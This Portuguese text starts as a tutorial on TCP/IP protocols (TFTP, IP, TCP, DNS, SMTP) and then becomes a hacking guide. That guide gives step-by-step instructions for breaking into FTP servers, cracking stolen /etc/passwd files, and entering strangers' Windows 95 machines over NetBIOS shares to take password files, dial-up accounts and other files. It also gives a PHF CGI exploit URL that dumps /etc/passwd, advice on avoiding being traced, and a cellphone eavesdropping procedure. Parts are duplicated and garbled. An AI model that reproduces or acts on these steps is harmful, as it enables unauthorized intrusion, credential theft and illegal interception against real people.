UDP: (User Datagram Protocol)
RIP: (Routing Information Protocol)
HTTP: (Hypertext Transfer Protocol)
NNTP: (Network News Transfer Protocol )
SMTP: (Simple Mail Transfer Protocol )
SNMP: (Simple Network Management Protocol )
FTP: (File Transfer Protocol)
TFTP: (Trivial File Transfer Protocol )
INETPhone: (Telephone Services on Internet )
IRC: (Internet Relay Chat )
RPC: (Remote Procedure Call)
NFS: (Network File System)
DNS: (Domain Name System)
Talvez seja difícil lembrar todos esses acrônimos, ate porque alguns também são utilizados por outros protocolos (por exemplo o protocolo RIP da família Novell, ou o IPX, é diferente do RIP da família TCP/IP). Alem do mais, saber exatamente quais são os protocolos que compõem uma determinada família não é pré-requisito para compreender o funcionamento básico da rede.
Se um pacote consegue se perder na rede, o receptor indicara time-out e podera retransmitir seu último pacote (o qual pode ser dados ou um reconhecimento ). Isto motiva ao transmissor do pacote perdido a retransmitir o pacote perdido. O transmissor tem que guardar apenas um pacote para retransmissão,desde cada passo de reconhecimento garante que todos os pacotes mais anteriores tenham sido recebidos.
Abaixo um esboço de mais ou menos como funciona:
Notar que as duas máquinas envolvidas na transferência são consideradas transmissoras e receptoras. Uma envia dados e recebe reconhecimento, a outra envia reconhecimento e recebe dados.
Muitos erros são causados pelo termino da conexão. Um erro é sinalizado enviando um pacote de erro. Este pacote não é reconhecido nem retransmitido (i.e., um servidor TFTP ou usuário pode terminar depois enviando uma mensagem de erro) assim o outro terminal da conexão não deve recebe-lo. Portanto os time-out são usados para detectar tais terminais quando o pacote de erro foi perdido.
Uma visão resumida do Protocolo
Alguma transferencia se inicia com um pedido de leitura ou escrita de um arquivo, o qual também serve para pedir uma conexão. Se o servidor reconhece o pedido, a conexão é aberta e o arquivo é enviado num bloco de tamanho fixo de 512 bytes.
Cada pacote de dados contem um bloco de dados e deve ser reconhecido por um pacote de acknowledgment antes que o próximo pacote possa ser enviado. Um pacote de dados menor que 512 bytes sinaliza a terminação de uma transferencia.
Se um pacote consegue se perder na rede, o receptor indicara time-out e poderá retransmitir seu ultimo pacote (o qual pode ser dados ou um reconhecimento ). Isto motiva ao transmissor do pacote perdido a retransmitir o pacote perdido. O transmissor tem que guardar apenas um pacote para retransmissão ,desde cada passo de reconhecimento garante que todos os pacotes mais anteriores tenham sido recebidos.
Notar que as duas maquinas envolvidas na transferencia são consideradas transmissoras e receptoras. Uma envia dados e recebe reconhecimento, a outra envia reconhecimento e recebe dados. Muitos erros são causados pela terminação da conexão. Um erro e sinalizado enviando um pacote de erro. Este pacote não e reconhecido nem retransmitido (i.e., um servidor TFTP ou usuário pode terminar depois enviando uma mensagem de erro) assim o outro terminal da conexão não deve recebe-lo. Portanto os time-out são usados para detectar tais terminais quando o pacote de erro foi perdido.
8.4.2 PROTOCOLO IP
É responsável pelo roteamento de pacotes entre dois sistemas que utilizam a família de protocolos TCP/IP. Evita que dois pacotes se choquem durante o tráfego.
O protocolo IP define mecanismos de expedição de pacotes sem conexão. IP define três pontos importantes:
A unidade básica de dados a ser transferida na Internet.
O software de IP executa a função de roteamento, escolhendo um caminho sobre o qual os dados serão enviados.
Incluir um conjunto de regras que envolvem a idéia da expedição de pacotes não confiáveis. Estas regras indicam como os hosts ou gateways poderiam processar os pacotes; como e quando as mensagens de erros poderiam ser geradas; e as condições em que os pacotes podem ser descartados. Dentro do protocolo IP tem os seguintes tópicos:
Endereços IP
Formato do datagrama IP
Roteamento do datagrama IP
ICMP (Internet Control Message Protocol)
8.4.3 TCP (TRANSPORT CONTROL PROTOCOL)
Ele se encarrega de empacotar e enviar os pacotes.
TCP e um protocolo da camada de transporte. Este e um protocolo orientado a conexão, o que indica que neste nível vão ser solucionados todos os problemas de erros que não forem solucionados no nível IP, dado que este ultimo e um protocolo sem conexão. Alguns dos problemas com os q TCP deve tratar são:
pacotes perdidos ou destruídos por erros de transmissão. expedição de pacotes fora de ordem ou duplicados. O TCP especifica o formato dos pacotes de dados e de reconhecimentos que dois computadores trocam para realizar uma transferência confiável, assim como os procedimentos que os computadores usam para assegurar que os dados cheguem corretamente. Entre estes procedimentos estão:
Distinguir entre múltiplos destinos numa maquina determinada.
Fazer recuperação de erros, tais como pacotes perdidos ou duplicados.
Para entender melhor o protocolo TCP a seguir veremos alguns conceitos, para depois passarmos ao formato TCP.
Portas, Conexões e Endpoints
Segmentos, fluxo e Numero de Seqüência
Formato do Segmento TCP
DNS (Domain Name System) O DNS (Domain Name System) e um esquema de gerenciamento de nomes, hierárquico e distribuído. O DNS define a sintaxe dos nome s usados na Internet, regras para delegação de autoridade na definição de nomes, um banco de dados distribuído que associa nomes a atributos (entre eles o endereço IP) e um algoritmo distribuído para mapear nomes em endereços. O DNS e especificado nas RFCs 882, 883 e 973.
As aplicações normalmente utilizam um endereço IP de 32 bits no sentido de abrir uma conexão ou enviar um datagrama IP. Entretanto, os usuários preferem identificar as maquinas através de nomes ao invés de números. Assim e necessário um banco de dados que permita a uma aplicação encontrar um endereço, dado que ela conhece o nome da maquina com a qual se deseja comunicar.
Um conjunto de servidores de nomes mantém o banco de dados com os nomes e endereços das maquinas conectadas a Internet. Na realidade este e apenas um tipo de informação armazenada no Domain System (sistema de domínios).Note que e usado um conjunto de servidores interconectados, ao invés de um único servidor centralizado. Existem atualmente tantas instituições conectadas a Internet que seria impraticável exigir q elas notificassem uma autoridade central toda vez que uma maquina fosse instalada ou trocasse de lugar. Assim, a autoridade para atribuição de nomes e delegada a instituições individuais. Os servidores de nome formam uma arvore, correspondendo a estrutura institucional. Os nomes também adotam uma estrutura similar.
Um exemplo típico e o nome chupeta.jxh.xyz.br. Para encontrar seu endereço Internet, pode ser necessário o acesso a ate quatro servidores de nomes. Inicialmente deve ser consultado um servidor central, denominado servidor raiz, para descobrir onde esta o servidor br. O servidor br e o responsável pela gerência dos nomes das instituições/empresas brasileiras ligadas a Internet. O servidor raiz informa como resultado da consulta o endereço IP de vários servidores de nome para o nível br (pode existir mais de um servidor de nomes em cada nível, para garantir a continuidade da operação quando um deles para de funcionar). Um servidor do nível br pode então ser consultado, devolvendo o endereço IP do servidor X.Y.Z.
De posse do endereço de um servidor X.Y.Z. e possível solicitar que ele informe o endereço de um servidor jxh, quando, finalmente, pode-se consultar o servidor jxh sobre o endereço da maquina chupeta. O resultado final da busca e o endereço Internet correspondente ao nome chupeta.jxh.xyz.br
Cada um dos níveis percorridos e referenciado como sendo um domínio. O nome completo chupeta.jxh.xyz.br e um nome de domínio. Na maioria dos casos, não e necessário ter acesso a todos os domínios de um nome para encontrar o endereço correspondente, pois os servidores de nome muitas vezes possuem informações sobre mais de um nível de domínio o que elimina uma ou mais consultas. Alem disso, as aplicações normalmente tem acesso ao DNS através de um processo local (servidor para as aplicações e um cliente DNS),que pode ser implementado de modo a guardar os últimos acessos feitos, e assim resolver a consulta em nível local. Essa abordagem de acesso através de um processo local, simplifica e otimiza a tarefa das aplicações no que tange ao mapeamento de nomes em endereços, uma vez que elimina a necessidade de implementar, em todas as aplicações que fazem uso do DNS, o algoritmo de caminhamento na arvore de domínios descrito anteriormente. O DNS não se limita a manter e gerenciar endereços Internet. Cada nome de domínio e um no em um banco de dados, que pode conter registros definindo varias propriedades. Por exemplo, o tipo da maquina e a lista de serviços fornecidos por ela. O DNS permite que seja definido um alias (nome alternativo) para o no. Também e possível utilizar o DNS para armazenar informações sobre usuários, listas de distribuição ou outros objetos.
O DNS e particularmente importante para o sistema de correio eletrônico. No DNS são definidos registros que identificam a maquina que manipula as correspondências relativas a um dado nome, identificado assim onde um determinado usuário recebe suas correspondências. O DNS pode ser usado também para definição de listas para distribuição de correspondências
8.4.4 SMTP - SIMPLE MAIL TRANSFER PROTOCOL
O SMTP (Simple Mail Transfer Protocol) e o protocolo usado no sistema de correio eletrônico na arquitetura Internet TCP/IP. Um usuario, ao desejar enviar uma mensagem, utiliza o modulo interface com o usuário para compor a mensagem e solicita ao sistema de correio eletrônico que a entregue ao destinatário. Quando recebe a mensagem do usuário, o sistema de correio eletrônico armazena uma copia da mensagem em seu spool ( área do dispositivo de armazenamento), junto com o horário do armazenamento e a identificação do remetente e do destinatário. A transferencia da mensagem e executada por um processo em background, permitindo que o usuário remetente, após entregar a mensagem ao sistema de correio eletrônico, possa executar outras aplicações. O processo de transferencia de mensagens, executando em background, mapeia o nome da maquina de destino em seu endereço IP, e tenta estabelecer uma conexão TCP com o servidor de correio eletrônico da maquina de destino. Note que o processo de transferencia atua como cliente do servidor do correio eletrônico. Se a conexão for estabelecida, o cliente envia uma copia da mensagem para o servidor, que a armazena em seu spool. Caso a mensagem seja transferida com sucesso, o servidor avisa ao cliente que recebeu e armazenou uma copia da mensagem. Quando recebe a confirmação do recebimento e armazenamento, o cliente retira a copia da mensagem que mantinha em seu spool local. Se a mensagem, por algum motivo, não for transmitida com sucesso, o cliente anota o horário da tentativa e suspende sua execução. Periodicamente o cliente acorda e verifica se existem mensagens a serem enviadas na área de spool e tenta transmiti-las. Se uma mensagem não for enviada por um período, por exemplo de dois dias, o serviço de correio eletrônico devolve a mensagem ao remetente, informando que não conseguiu transmiti-la.
Em geral, quando um usuário se conecta ao sistema, o sistema de correio eletrônico e ativado para verificar se existem mensagens na caixa postal do usuário. Se existirem, o sistema de correio eletrônico emite um aviso para o usuário que, quando achar conveniente, ativa o modulo de interface com o usuário para receber as correspondências.
Uma mensagem SMTP divide-se em duas partes: cabeçalho e corpo, separados por uma linha em branco. No cabeçalho são especificadas as informações necessárias para a transferencia da mensagem. O cabeçalho e composto por linhas, que contem uma palavra-chave seguida de um valor. Por exemplo, identificação do remetente (palavra-chave "to:" seguida do seu endereço), identificação do destinatário, assunto da mensagem, etc... No corpo são transportadas as informações da mensagem propriamente dita. O formato do texto e livre e as mensagens são transferidas no formato texto.
Os usuários do sistema de correio eletrônico são localizados através de um par de identificadores. Um deles especifica o nome da maquina de destino e o outro identifica caixa postal do usuário. Um remetente pode enviar simultaneamente varias copias de uma mensagem, para diferentes destinatários utilizando o conceito de lista de distribuição(um nome que identifica um grupo de usuários). O formato dos endereços SMTP e o seguinte:
nome_local@nome_do_dominio
Onde o nome_do_dominio identifica o domínio ao qual a maquina de destino pertence (esse endereço deve identificar um grupo de maquinas gerenciado por um servidor de correio eletrônico). O nome local identifica a caixa postal do destinatário.
O SMTP especifica como o sistema de correio eletrônico transfere mensagens de uma maquina para outra. O modulo interface com usuário e a forma como as mensagens são armazenadas não são definidos pelo SMTP. O sistema de correio eletrônico pode também ser utilizado por processos de aplicação para transmitir mensagens contendo textos.
8.4.5 FTP (FILE TRANSFER PROTOCOL)
Protocolo padrão de transferência de arquivos entre computadores, usado normalmente para transmitir ou receber arquivos pela Internet.
9. INVASÃO
A invasão pode ser feita de várias maneiras diferentes e por vários programas diferentes, aqui não iremos tratar de todas as maneiras existentes, mesmo porque isso seria quase impossível, mas trataremos de algumas maneiras mais comuns de invasão a computadores e servidores, nada muito complicado, Atenção: Não fiz esta monografia com fins de criar hackers, e sim como uma forma de você poder verificar a vulnerabilidade dos sistemas e poder se proteger de invasões, e tapar os buracos do S.O. mesmo por que são através desses buracos que os hackers invadem sua máquina, pegam senhas de usuários corporativos, copiam seus arquivos, puxam a informação que precisam e vão embora, as vezes deixando para trás algumas pistas, mas também um caminho cheio de Trojans e vírus, geralmente difícil de ser percorrido por usuários comuns da rede
9.1 ATAQUES POR MONITORAÇÃO
Os ataques por Monitoração são baseados em software de Monitoração de rede conhecido como "sniffer", instalado sur repticiamente pelos invasores.
O sniffer grava os primeiros 128 bytes de cada sessão login, telnet e FTP session vista naquele segmento de rede local, comprometendo TODO o tráfego de/para qualquer máquina naquele segmento, bem como o tráfego que passar por aquele segmento.
Os dados capturados incluem o nome do host destino, o username e a password.
A informação é gravada num arquivo posteriormente recuperado pelo invasor para ter acesso a outras máquinas.
Em muitos casos os invasores obtém acesso inicial aos sistemas usando uma das seguintes técnicas:
Obtém o arquivo de passwords via TFTP em sistemas impropriamente configurados
Obtém o arquivo de password de sistemas rodando versões inseguras do NIS
Obtém acesso ao sistema de arquivos locais via pontos exportados para montagem com NFS, sem restrições
Usam um nome de login e password capturada por um sniffer rodando em outro sistema. Uma vez no sistema, os invasores obtém privilégios de root explorando vulnerabilidades conhecidas, tal como rdist, Sun Sparc integer division, e arquivos utmp passíveis de escrita por todo mundo ou usando uma password de root capturada.
Eles então instalam o software sniffer, registrando a informação capturada num arquivo invisível.
Adicionalmente, eles instalam cavalos de Tróia em substituição e uma ou mais dentre os seguintes arquivos do sistema, para ocultar sua presença:
/bin/login /usr/etc/in.telnetd /usr/kvm/ps /usr/ucb/netstat
9.2 INVASÃO VIA FTP
Vou lhes ensinar duas formas de fazerem isso, embora pareçam iguais, elas tem suas diferenças entre si.
9.2.1 INVASÃO VIA FTP (PARTE 1)
INVASÃO POR FTP: Não vá achando que é fácil assim invadir um servidor FTP. Precisa de paciência. Ah! Nunca fique mais do que 5 minutos lá, senão você é rastreado e aí, CADEIA! Só não é cadeia se você estiver usando uma conta hackeada. Primeiro você precisa de um programa de FTP. Mesmo que você tenha um no Windows, eu aconselho a usar o FTP de DOS mesmo, é mais seguro, embora mais complicado. Aí vão os passos. Conectado, abra o Prompt do MS-DOS. Veja se você está no diretório do WINDOWS. Se estiver, digite FTP e espere carregar. Aí dê open, vai aparecer um Prompt (to), aí você coloca o servidor FTP. Aí vão alguns:
ftp.mandic.com.br
ftp.sol.com.br
ftp.plugnet.com.br
ftp.compuserve.com.br
ftp.microsoft.com
Espera conectar. Talvez dê erro. Se der tudo certo coloque no username quote cwd~root ou quote cwd~sys ou outro comando UNIX. No password põe quote pass ftp . Entrando lá você vai estar no diretório home/root, dê cd\etc e você vai estar no lugar certo. Aí é com você, descobre o que fazer. Se você pegar o arquivo de senhas, vai estar criptografado, você vai precisar de um aplicativo para descriptografar, tipo o Crack Jack. Procure ele pela Net.
Tome muito cuidado. Qualquer descuido pode ocasionar a sua prisão.
Ao entrar você vai estar no Diretório do login, tipo /home/root/, Dai, para ver a lista de users você volta um diretório vá para o diretório /home/ e cada diretório é um usuário,... Pois a maioria dos usuários usa a mesma senha login.... Tome cuidado... NÃO seja louco de apagar um arquivo que eles vão te achar e ai você Ta ferrado!
Lembre-se do que você não deve fazer nesse dispositivo, e esse arquivo é apenas uma curiosidade. O Autor não se responsabiliza por nada e nem quer saber de nada.
9.2.2 INVASÃO POR FTP (PARTE 2)
Não vá achando que é fácil assim invadir um servidor FTP. Precisa de paciência. Ah! Nunca fique mais do que 5 minutos lá, senão você é rastreado e aí, CADEIA! Só não é cadeia se você estiver usando uma conta hackeada.
Primeiro você precisa de um programa de FTP. Mesmo que você tenha no Windows, eu aconselho a usar o FTP de DOS mesmo, é mais seguro, embora mais complicado. Aí vão os passos.
Conectado, abra o Prompt do MS-DOS. Veja se você está no diretório do WINDOWS. Se estiver, digite FTP e espere carregar. Aí dê open, vai aparecer um Prompt (to), aí você coloca o servidor FTP. Aí vão alguns:
ftp.mandic.com.brftp.plugnet.com.brftp.compuserve.com.brftp.microsoft.com.brEspera conectar. Talvez dê erro. Se der tudo certo coloque no username quote cwd-root ou quote cwd-sys ou outro chamado UNIX. No password põe quote pass.ftp. Aí é com você, descobre o que fazer. Se você pegar o arquivo de senhas, vai estar criptografado, você vai precisar de um aplicativo para descriptografar, tipo o Crack Jack. Procure ele pela Net.
9.3 O QUE É, E COMO USAR O ANONYMIZER?
Qualquer Home-Page que você visita pode muito bem obter informações sobre você, como por exemplo: Provedor, endereço IP, sistema operacional que esta usando, Browser que esta usando e talvez o e-mail.
O Anonymizer www.anonymizer.com age como intermediário entre o seu programa de navegação e os outros websites. Assim sendo, ele impede que o site visitado tenha acesso a qualquer tipo de informação sua.
Para usar o serviço, você deve anteceder os URLs com o seguinte endereço do Anonymizer (http://www.anonymizer.com:8080) . Se você quiser acessar a Home-Page da Microsoft, por exemplo, e não quiser que ela obtenha seus dados, você deve digitar no seu navegador http://www.anonymizer.com:8080/http://www.Microsoft.com.Pronto desta forma você Poderá até mesmo usar aquelas senhas de sites pornográficos que você tinha sem se preocupar tanto com a sua segurança.
OBSERVAÇÃO : O Anonymizer não é totalmente seguro. Por isso não pense que usando o Anonymizer você pode sair por ai usando senhas falsas em tudo que é Site e nunca saberão quem é você !!
9.4 INVASÃO POR IP
9.4.1 INVASÃO POR IP - PARTE 1
Lembre-se que isso só dará certo se você conectar via Dial-Up pelo Win95,ppp.Caso contrário não funcionará, é que também só dará certo se o compartilhamento de dados e impressão estiver ligados. É lógico que há maneiras de bular isso, mas é preciso manjar de alguma linguagem.(você pode fazer uma linha de comando no Windows que vai até o compartilhamento ligar e passar esse programa para o cara dizendo que é outra coisa, o único problema é que ele tem que reiniciar o CPU, mas há modos para mudar isso também)
9.4.1.1 INVADINDO USUÁRIO DE WINDOWS95 QUE UTILIZAM A REDE DIAL-UP COM UMA CONEXÃO PPP.
Devido a um enorme número de Bugs, e uma capacidade de proteção que permite que qualquer pessoa invada um micro que utilize a rede Dial-Up com uma conexão PPP. Mesmo que você não esteja utilizando o compartilhamento de arquivos, qualquer pessoa pode invadir seu computador se você estiver utilizando esse tipo de conexão. Para está "receita de bolo" funcionar, você tem que estar usando a rede Dial-Up e uma conexão PPP. Antes de tudo verifique se você possui os drivers de clientes da Microsoft. Caso não estejam instalados, instale-os através do painel de controle no ícone redes.
Verifique também, se o compartilhamento de arquivos e impressora está instalados.
Para configurar essa opções é bem simples. Vá ao Painel de Controle e abra Rede. Verifique as propriedades do protocolo de TCP/IP. Ali você encontrará a opção para ativar a resolução WINS. No caso de você não conhecer nenhum servidor WINS, utilize 204.118.34.6 como primário e 204.118.34.11 como secundário. Esses servidores são dos EUA, e gratuitos. Caso queira outros endereços, utilize um dos mecanismos de busca na Internet. Para configurar o LMHOSTS, você precisa criar um arquivo texto simples, utilizando-se até mesmo o Bloco de Notas do Windows. O arquivo criado deve chamar-se LMHOSTS. É nesse arquivo que ficarão os endereço de IP e os nomes dos computadores que você terá acesso. Para localizar um determinado computador, você digita o seu número de IP a seguir seu NetBios, na mesma linha, separados por um espaço. Se você executar o programa NBSTSTAT, seguido da opção -N, você obterá essa lista, com o nome e o IP de seu computador sempre sendo o primeiro da lista, seguidos das outras máquinas disponíveis, tudo numa janela DOS. Através do Explorer você poderá ver os computadores disponíveis na rede, dos quais você ainda poderá utilizar os discos mapeando-os, o que os tornará unidades de seu computador.
9.4.1.2 INVASÃO PELA PORTA 666
Para invadir é fácil, você deve ter um programa de conexão via Telnet (Telnet que já vem com o WIN95 ou similar) e também um programa chamado aabout(se você não tiver este programa procura na Internet geralmente em páginas de hackers você encontra, se não conseguir procure em sites de busca comum, mas acho difícil você conseguir encontrar este arquivo nestes sites, uma dica procure no site da warez.com lá tem uma busca de programas, talvez você encontre ele lá). O que deve ser feito, este programa aabout deve ser acionados por ambas as partes (invasor e invadido) e o que ele faz?? Bem, ele abre uma porta de conexão entre os dois CPUs via porta 666. Você deve ligar Telnet colocar no host o número do IP da pessoa e em port deve-se colocar 666. Bem você já está conectado, dai no login você deve digitar eg! (com o "?" e dar um dir vendo tudo o que tem no CPU da outra pessoa).
9.4.2 INVASÃO POR IP - PARTE 2
Para hackear um sistema ligado a Internet/Intranet ou até mesmo uma simples rede que utiliza o TCP/IP, nada melhor do que saber lidar fundo com o protocolo mais usado e mais famoso no mundo inteiro. TCP/IP é o nome que se da a toda família de protocolos utilizados pela Internet. Esta família de protocolos foi desenvolvida pela DARPA (Defense Advanced Research Project Agency) no DOD (Departamento de Defesa dos Estados Unidos). Este conjunto de protocolos foi desenvolvido para permitir aos computadores compartilharem recursos numa rede. Toda a família de protocolos inclui um conjunto de padrões que especificam os detalhes de como comunicar computadores, assim como também convenções para interconectar redes e rolear o tráfego.
A Microsoft definitivamente nunca afirmou que o Windows 95 (ou algum seus antecessores do DOS) fosse seguro. De fato, eles oferecem produtos diferentes para pessoas com segurança. Na enorme rede que a Internet, que cresce dia a dia, deve haver cerca de 1000 usuários novos a cada dia em todo o mundo. Uma grande parte da Internet não é composta apenas por servidores e mainframes, mas sim computadores pessoais, sendo que a maioria deles utiliza como sistema operacional o programa que a Microsoft se orgulha tanto, do qual fez muita propaganda na época de seu lançamento, o Windows 95. Por que os usuários da Internet não se preocupam com a segurança?? Poucas pessoas sabem que todos os recursos de rede estão disponíveis, como padrão, em qualquer conexão TCP, sendo essa mesmo uma PPP ou SLIP discada para a maioria dos ISP's. Poucas pessoas filtram as portas apropriadas em seus firewalls, deixando a maioria das máquinas conectadas com acesso livre pelo NetBios.
Provavelmente, o compartilhamento dos drivers e/ou diretórios é muito conveniente, e as pessoas não vêem que estão abrindo as portas de seus computadores para "espertinhos" principalmente, sendo que de cada 3 usuários, 1 tem o compartilhamento sem as devidas proteções por senha. Para os usuários que realmente se preocupam com o uso de senhas, na maioria dos caso, utilizam uma senha muito óbvia, e sem precisar logon, sem demora, ou algum outro problema de hackear senhas, de 3 a 7 senhas podem ser descobertas por segundo através da Net. Recentemente, um bug foi descoberto na maioria das versões do Windows 95, que causava o travamento do DOS, quando uma porção (out-band) de dados é enviado para uma porta de TCP. Uma vez que todas as máquinas rodam o Win 95 reservavam, por padrão, a porta 139 para conecções de NBT, a forma de ataque padrão era conectar-se nessa porta e enviar dados OOB. A Microsoft correu e lançou um patch que concertava esse bug no Win NT, mas a resposta da empresa para o Win 95 foi muito mais lenta. O patch inicial era lançar um registro que desabilitava NBT e recomendava desligar qualquer outra porta, tal com a 113 (ident). Isso causou com um grande números de " surfistas virtuais" ficassem invulneráveis a esses ataques. A América online também começou a filtral essa porta, tal como a UPD 137 (nbnames) fazendo com que muitos lammers ficassem protegidos. (Still plenty of phish in the c) Tudo que é preciso para acessar uma máquina através da NBT, é o nome da máquina na configuração do NetBios e seu endereço IP. A maravilhosa Microsoft também incluiu no Windows 95 e NT, uma ferramenta que vai mostrar as configurações da NetBios da máquina remota, incluindo o nome da máquina, login e nome de domínio, os quais quase sempre fazem parte de senha de compartilhamento. Para acessar uma via NBT, capture o nome da máquina a ser conectada usando o nbtstat.exe (nbtstat -A IP, sendo que o nome da máquina é geralmente listado primeiro) . Coloque o IP e o nome da máquina num arquivo chamado "Lmhosts" no seu diretório do Windows, sendo que cada um fique em uma linha, e pronto, você conseguirá acessar a outra máquina pelo nome e usar qualquer função de rede, tais como \\máquina, net use \\máquina\res, start\\máquina, ping máquina , winnuke máquina, etc... Uma vez que o acesso foi conseguido, pelo diretório do Windows (ou pela senha do ADMIN$, ou por qualquer outra), os arquivos de senha podem ser obtidos e descriptografados utilizando uma variação do glide code , viola: todas as senhas do usuário, incluindo a das conecções dial-up, qualquer senha da Web, e senhas para todos os recursos de rede que eles tenham acessado. Uma lista dos documentos mais recentes acessados pelo usuário podem ser encontrados na pasta "recent", o desktop pode ser manipulado diretamente pelo diretório "\windows\desktop", bem como o menu Iniciar, pelo diretório "Start Menu\Programs", se você renomear o diretório de fontes, resetar a máquina, o windows vai exibir a mensagem "Não foi possível executar o gdi.exe” para ficar um pouco mais invisível. Pra que isso pode ser útil? Conseguir contas dial-up no provedor de sua escolha: Procure através das conexões dial-up's até achar uma máquina que tenha o diretório do windows compartilhado e copie o(s) arquivo(s).pwl dela. Quando foi mostrado que o sistema de criptografia dos arquivos.pwl da Microsoft parecia uma brincadeira de criança, a Microsoft percebeu e também lançou um patch, e também nas versões posteriores do Win 95, os arquivos ficaram mais escondidos e, que eu sabia, ninguém conseguiu desencriptografar o arquivo por enquanto, mas eu não tenho certeza se ainda continuam tentando. Mas mesmo assim, ainda estamos bem. A maioria das pessoas está utilizando a versão com o bug, então, continue procurando até conseguir abrir um desses. Algumas senhas também podem ser encontradas em programa FTP, como o WSFTP, o CuteFTP, e decodificadores podem ser encontrados para seus bancos de dados de senhas. Pegue tudo o que você conseguir, use o IRC para encontrar pessoas que tenham estes recursos disponíveis em seu computador. Use o diretório "Recent" para encontrar arquivos interessantes, arquivos.lnk, arquivos de atalhos para programas de cliente e servidor de FTP para encontrar diretórios de arquivos de downloads e/ou zipados. Abra programas na máquina remota: Você pode colocar links no diretório "Startup" da pessoa para rodar o programa de sua escolha. Os arquivos ".exe" e ".lnk", são parcialmente muito úteis, por que eles não aparecem na listagem dos últimos documentos Italians, na pasta "Recent". Use isto para criar uma bagunça e ocupar bastante o processador do computador, ou abrir um programa com a mensagem de sua escolha. Então concluindo. Uma vez que a única proteção que o usuário pode utilizar no modo compartilhado é o uso adequado de senhas, estas podem ter no máximo 8 caracteres e não são casesensitive, escolha uma muito boa, e até a pessoa começar a desconfiar (o que não vai ser muito difícil), você pode se divertir brincando com os arquivos dos usuários.
9.4.2.1 INVADINDO
Certifique-se de que você possui este programa: nbtstat.
Vá ao Prompt do MS-DOS.
Digite: nbtstat -a o IP do cara que você quer invadir.
Aparecerá se a pessoa tiver compartilhamento de arquivos as pastas do PC dela. Se não aparecerá: Host Not Found (o problema é que não da para invadir o computador de certos usuários por causa disso então não se entusiasme tanto pois só da para invadir aquelas pessoas que tem no PC compartilhamento de arquivos e pastas).
Caso apareça um monte de nomes esquisitos com isso antes: "<03>", você deve pegar o nome do negócio que estiver com <03> atrás do nome.
Crie um arquivo .txt com o nome de LMHOSTS. Digite lá: o IP da cara NetBios dele. O NetBios é aquele nome esquisito que tem atrás. (Digite exatamente daquela forma que eu digitei)
Mapeie sua unidade de disco de forma que a máquina do cara se torne parte de seu PC.
Vá em "Iniciar" e digite: //IP do cara e ponha "OK".
Pronto! Você invadiu por IP!
Conselho: Nunca apague nem modifique NADA somente fuce bastante nas coisas do lammer e se achar algo interessante pegue para você.
OBS:
Tem algumas pessoas que renomeiam o arquivo vnbt.386 no windows\system para que se alguém tente te nukar ou invadir não consiga...; pois bem, você vai ter que renomear o seu arquivo senão não da para invadir.
9.5 HACKER IE
Ataque via browser é um dos ataques mais fáceis de executar, mas não da nem 50% de sucessos nos ataques. Vou tentar explicar como você usa esse método: Primeiramente você tem que entender o que está fazendo, não adianta selecionar CTRL+C e colocar no navegador achando que ele vai fazer tudo para você, entenda: Bom, como já sabe o geralmente o arquivo "passwd" é o que contém os passwords cripitografados, existem vários servidores que só Root pode entrar no diretório "/etc", para outros usuários é bloqueado o acesso a esse diretório, mas existe um método para tentar pegar esse arquivo. no diretório /egi-bin do Web Server (Página Web do servidor) geralmente contém um arquivo chamado PHF permite aos usuários ganhar acesso remoto para arquivos (inclusive o /etc/passwd). Então através desse arquivo você pode tentar pegar a lista de passwords, é muito simples, apenas digite essa URL no seu browser: http://xxx.xxx.xxx/egi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd. Então substitua o "xxx.xxx.xxx" pelo endereço do servidor que você quer hackear.
Ex:http://www.tba.com.br/egi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd. Bom, recomendo que você disfarce seu IP para que não seja pego!
10. CONTA FALSA...CUIDADO
Obtendo uma conta falsa: Regra básica - NUNCA USE SUA PRÓPRIA CONTA P/ HACKEAR, é muito arriscado, a maioria ou todos os sistemas guardam seu IP, e depois checam no seu provedor e chegam até você. Você pode usar aqueles provedores que dão horas extras mediante o número do cartão de crédito, mas use aqueles que fazem cadastro via Web. Não se cadastre com cartão falso por acesso discado (tel/bbs), isso pode te levar a ##cadeia##, ou complicar seus pais, se você for de menor. Obs.: É claro, se você tiver um notebook tudo fica mais fácil, mas se você tem um notebook e se interessa por hack, você já deve saber disso tudo..... Bem agora vá ao site do ANONYMIZER (
Usando essa conta: Agora você tem uma conta, você deve agir assim: Essa conta só vai servir p/ UM único acesso, mais que isso já pode alastrar.... Você vai usar essa conta de MADRUGADA, naquela hora que o sysop esta babando no teclado, ou já foi dormir ( você já chamou o sysop as 3 da manhã, e ele apareceu????). IP: Uma explicação básica sobre IP Cada computador ligado a Internet recebe um número, chamado de endereço IP. Para o usuário comum, o IP também pode ser representado por palavras e nomes. Entendendo o IP: Cada IP e representado por quatro números, cada um com o valor de 0 a 256, que devem ser lidos da esquerda para a direita. O primeiro representa uma grande divisão da Internet. O segundo indica uma subdivisão da primeira grande divisão. O terceiro e uma subdivisão da divisão anterior. O quarto indica o computador que será acessado, dentro da subdivisão anterior. Os e-mails são representados por nomes, mas p/ a maquina são representados por números. EX: XXyyy@bbs.com.br = XXyyy@191.107.253.11 Quando fazemos um Login em uma rede qualquer ou num servidor de arquivos (FTP), ele automaticamente grava seu IP. (essa belíssima explicação foi retirada do help Informática, do Estadão. Mas até que lá tem algo interessante) No Zine Nethac02 tem uma ótima explicação do protocolo TPC/IP, que é o protocolo usado na Internet. Moral da historia: O IP é seu endereço na Internet, a partir dele pode-se chegar ao seu provedor e obter seus dados outro modo de chegarem ate você e o rastreamento telefônico, quando o hack é feito por acesso discado. Ai é fatal.....Por isso, nunca use seu telefone p/ isso.
11. ESCUTA COM CELULAR MOTOROLA
O sistema de telefonia celular e' altamente vulnerável ao phreaking. E' simples se fazer escutas telefônicas, e outras coisas como: clonagem de telefones para se efetuar ligações gratuitas, etc.
1. Tire a bateria e localize os pinos de contatos, eles são 3, os dois da extremidade são os pólos negativo e positivo do telefone e o do meio é que o de "Test mode".
2. Arrumar um pedacinho de papel alumínio, e colocar entre o pino central da bateria e do telefone, depois coloque a bateria
3. Ao ligar o telefone NÃO aparecerá a o contador de sinal, irão aparecer números piscando. Isso quer dizer que o telefone está pronto.
4. Atenção para a seqüência de códigos que tem que ser digitado:
# , daí aparece a mensagem " U5' "
08#, daí aparece só um apostrofe
daí é só escolher um código abaixo
110999 111020 111000 111030 111025
depois de cada código digitar #
E pronto
OBS.: Existem mais códigos é que é fácil de achar é só começar com 11 e chutar os 4 próximos números.
